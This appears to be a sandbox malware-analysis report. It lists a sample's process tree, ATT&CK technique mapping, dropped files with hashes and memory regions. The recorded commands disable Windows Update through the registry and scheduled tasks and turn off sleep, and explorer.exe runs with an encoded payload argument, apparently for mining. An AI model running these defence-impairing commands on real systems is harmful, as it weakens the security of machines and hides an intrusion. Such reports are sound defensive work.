C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
8⤵
PID:848

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
8⤵
PID:4316

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
8⤵
PID:1104

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
8⤵
PID:3004

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
8⤵
PID:4432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
8⤵
PID:4452

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:2360

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
8⤵
PID:1580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
7⤵
PID:1100

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
7⤵
PID:2320

C:\Windows\explorer.exe
C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\838029.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\838029.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
443B

MD5
8add56521ef894ef0c66ecd3e989d718

SHA1
2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

SHA256
01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

SHA512
af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
Filesize
1.3MB

MD5
8be215abf1f36aa3d23555a671e7e3be

SHA1
547d59580b7843f90aaca238012a8a0c886330e6

SHA256
83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

SHA512
38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
memory/240-181-0x0000000000000000-mapping.dmp

Download
memory/796-221-0x0000000000000000-mapping.dmp

Download
memory/796-169-0x0000000000000000-mapping.dmp

Download
memory/964-222-0x0000000000000000-mapping.dmp

Download
memory/964-170-0x0000000000000000-mapping.dmp

Download
memory/968-176-0x0000000000000000-mapping.dmp

Download
memory/1100-207-0x0000000000000000-mapping.dmp

Download
memory/1152-192-0x0000000000000000-mapping.dmp

Download
memory/1180-194-0x0000000000000000-mapping.dmp

Download
memory/1332-196-0x0000000000000000-mapping.dmp

Download
memory/1392-209-0x0000000000000000-mapping.dmp

Download
memory/1524-224-0x0000000000000000-mapping.dmp

Download
memory/1560-189-0x0000000000000000-mapping.dmp

Download
memory/1668-185-0x0000000000000000-mapping.dmp

Download
memory/1936-153-0x0000000000000000-mapping.dmp

Download
memory/1956-220-0x0000000000000000-mapping.dmp

Download
memory/2036-167-0x0000000000000000-mapping.dmp

Download
memory/2052-193-0x0000000000000000-mapping.dmp

Download
memory/2060-158-0x0000000000000000-mapping.dmp

Download
memory/2096-179-0x0000000000000000-mapping.dmp

Download
memory/2132-159-0x0000000000000000-mapping.dmp

Download
memory/2220-151-0x000002D6AE0A0000-0x000002D6AE4DE000-memory.dmp

Filesize
4.2MB

Download
memory/2220-152-0x00007FFCAEF00000-0x00007FFCAF9C1000-memory.dmp

Filesize
10.8MB

Download
memory/2284-217-0x0000000000000000-mapping.dmp

Download
memory/2320-213-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2320-216-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2320-214-0x0000000000401BEA-mapping.dmp

Download
memory/2320-165-0x0000000000000000-mapping.dmp

Download
memory/2348-156-0x00007FFCAEF00000-0x00007FFCAF9C1000-memory.dmp

Filesize
10.8MB

Download
memory/2348-155-0x0000025A45F90000-0x0000025A45FB2000-memory.dmp

Filesize
136KB

Download
memory/2348-154-0x0000000000000000-mapping.dmp

Download
memory/2420-190-0x0000000000000000-mapping.dmp

Download
memory/2432-191-0x0000000000000000-mapping.dmp

Download
memory/2512-187-0x0000000000000000-mapping.dmp

Download
memory/2616-183-0x0000000000000000-mapping.dmp

Download
memory/2664-180-0x0000000000000000-mapping.dmp

Download
memory/2744-200-0x00007FFCB0A20000-0x00007FFCB14E1000-memory.dmp

Filesize
10.8MB

Download
memory/2744-218-0x0000015974EC0000-0x0000015974ED2000-memory.dmp

Filesize
72KB

Download
memory/2808-195-0x0000000000000000-mapping.dmp

Download
memory/2892-144-0x000000000A060000-0x000000000A0C6000-memory.dmp

Filesize
408KB

Download
memory/2892-141-0x0000000008F30000-0x00000000090F2000-memory.dmp

Filesize
1.8MB

Download
memory/2892-143-0x0000000009270000-0x00000000092AC000-memory.dmp

Filesize
240KB

Download
memory/2892-140-0x0000000006C60000-0x0000000006CC2000-memory.dmp

Filesize
392KB

Download
memory/2892-130-0x0000000000BF0000-0x0000000000C28000-memory.dmp

Filesize
224KB

Download
memory/2892-147-0x000000000A150000-0x000000000A1CA000-memory.dmp

Filesize
488KB

Download
memory/2892-137-0x0000000006600000-0x0000000006622000-memory.dmp

Filesize
136KB

Download
memory/2892-136-0x00000000065B0000-0x0000000006600000-memory.dmp

Filesize
320KB

Download
memory/2892-135-0x0000000006B40000-0x0000000006BF0000-memory.dmp

Filesize
704KB

Download
memory/2892-132-0x0000000006D60000-0x0000000007304000-memory.dmp

Filesize
5.6MB

Download
memory/2892-131-0x0000000006120000-0x00000000061B2000-memory.dmp

Filesize
584KB

Download
memory/2948-211-0x0000000000000000-mapping.dmp

Download
memory/3116-219-0x0000000000000000-mapping.dmp

Download
memory/3260-202-0x0000000000000000-mapping.dmp

Download
memory/3260-205-0x00007FFCB0A20000-0x00007FFCB14E1000-memory.dmp

Filesize
10.8MB

Download
memory/3316-227-0x0000000000000000-mapping.dmp

Download
memory/3328-178-0x0000000000000000-mapping.dmp

Download
memory/3408-168-0x0000000000000000-mapping.dmp

Download
memory/3496-157-0x0000000000000000-mapping.dmp

Download
memory/3500-223-0x0000000000000000-mapping.dmp

Download
memory/3520-226-0x0000000000000000-mapping.dmp

Download
memory/3564-182-0x0000000000000000-mapping.dmp

Download
memory/3568-186-0x0000000000000000-mapping.dmp

Download
memory/3620-201-0x0000000000000000-mapping.dmp

Download
memory/3928-160-0x0000000000000000-mapping.dmp

Download
memory/3964-175-0x0000000000000000-mapping.dmp

Download
memory/4040-206-0x0000000000000000-mapping.dmp

Download
memory/4104-163-0x0000000000000000-mapping.dmp

Download
memory/4104-210-0x0000000000000000-mapping.dmp

Download
memory/4220-148-0x0000000000000000-mapping.dmp

Download
memory/4256-225-0x0000000000000000-mapping.dmp

Download
memory/4388-177-0x0000000000000000-mapping.dmp

Download
memory/4416-172-0x0000000000000000-mapping.dmp

Download
memory/4440-212-0x0000000000000000-mapping.dmp

Download
memory/4444-188-0x0000000000000000-mapping.dmp

Download
memory/4588-184-0x0000000000000000-mapping.dmp

Download
memory/4636-208-0x0000000000000000-mapping.dmp

Download
memory/4692-161-0x0000000000000000-mapping.dmp

Download
memory/4700-166-0x0000000000000000-mapping.dmp

Download
memory/4776-162-0x0000000000000000-mapping.dmp

Download
memory/4780-171-0x0000000000000000-mapping.dmp

Download
memory/4884-164-0x0000000000000000-mapping.dmp

Download
memory/4896-174-0x0000000000000000-mapping.dmp

Download
memory/4984-173-0x0000000000000000-mapping.dmp

Download
memory/4984-228-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/4984-230-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/4984-229-0x000000014036DAD4-mapping.dmp

Download
memory/4984-231-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/4984-232-0x0000000000540000-0x0000000000560000-memory.dmp

Filesize
128KB

Download
memory/4984-233-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/4984-234-0x0000000002390000-0x00000000023D0000-memory.dmp

Filesize
256KB

Download